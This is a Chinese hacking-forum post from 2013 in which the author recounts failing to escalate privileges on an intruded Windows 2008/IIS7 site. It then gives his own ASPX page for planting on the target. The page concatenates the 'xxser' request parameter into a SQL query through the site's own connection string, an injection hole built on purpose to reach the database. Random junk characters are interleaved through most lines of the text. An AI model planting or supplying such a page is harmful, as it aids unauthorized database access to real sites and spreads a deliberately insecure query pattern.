昨天跟4z1看一个站点,提权很难提,看了整整5个小时,无果。 2008+iis7,无sa,无root,无各种服务。。。$ Y% T! x+ N5 ^8 X$ [1 ~
其实中用到了aspx构造注射来跨站,网上找了一堆代码,没一个能用的。; K) W6 `# {0 E3 F. `2 Z" `
代码量不多,自己写个拉倒了。烦死了。" _4 ]7 K+ y( ?" q& a8 F
8 A w: P, [. `: }+ ~ Q
. |! j) o5 ~) ^0 _9 o( e5 _<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">, ?5 p9 N; Q0 _$ Z4 m
<html xmlns="http://www.w3.org/1999/xhtml">
. H8 ~! J: m b# o, n Y4 i<head runat="server">
* d8 G9 o- G8 N t9 F& Y+ q <title>暗影aspx构造注射专用页面</title>
6 P$ F/ W1 q0 l. H z/ ?</head>
! M/ o+ g! a8 A* O" T<body>
2 Z( |' `) X. ]6 V7 o2 h% z. r <form id="form1" runat="server">
* j2 i% I& C% e& B+ \ <div> s6 o2 e* K* n* p
<script language="c#" runat="server">
- L( d7 a/ r5 ~) Z: e$ D% c * P& y' N9 p; U5 q( Y; L( z: U2 P4 l
void page_init(object sender, EventArgs e)
; y3 v2 x' h! Z9 u; z {7 }/ X( `1 h( l. t; ]
" k5 G5 i4 B" h/ ^* z) d* X
System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();
& q% u; l \* j) \! r( _) L
0 [8 a! o/ ^* @3 @, j conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();
1 |, ` |* F) \: z" ]( T conn.Open();& S; T3 F& x5 V. [" I* g
# P" n a& _: I3 o, T3 G9 O- ~ string i = this.Page.Request.Params["xxser"]; //这里是参数?xxser=1- k+ r+ s# X' [! F+ G; n# k8 \
& r: S9 O- x. ^# o( {* | System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);7 U* q O$ y% G% w* z
int x = command.ExecuteNonQuery();
3 D) i- j4 [2 Y: Y' m3 I Response.Write(i+"\n");9 }; ~6 l' t) ~) `' A
Response.Write(x);. G% w1 O; e t# J# Y# ~4 _; n
conn.Close();- _1 Q; G7 D6 F( t- I( l
}: v' z3 X. ?% p$ q$ _7 u8 D5 U' V3 w
7 n: m7 p3 `. c
</script>. t( F4 [% O" `, B# X" o
</div>; l8 V8 M) N/ t3 s# _9 O( g5 ^
</form>
* ]! w8 d' U+ u+ N0 ?: ]</body>& d/ I, n' d* d/ V, o7 G
</html>
c. _% b5 q# [4 z! J) j& x: K |
发表于 2013-3-20 21:32:01
收藏
支持
反对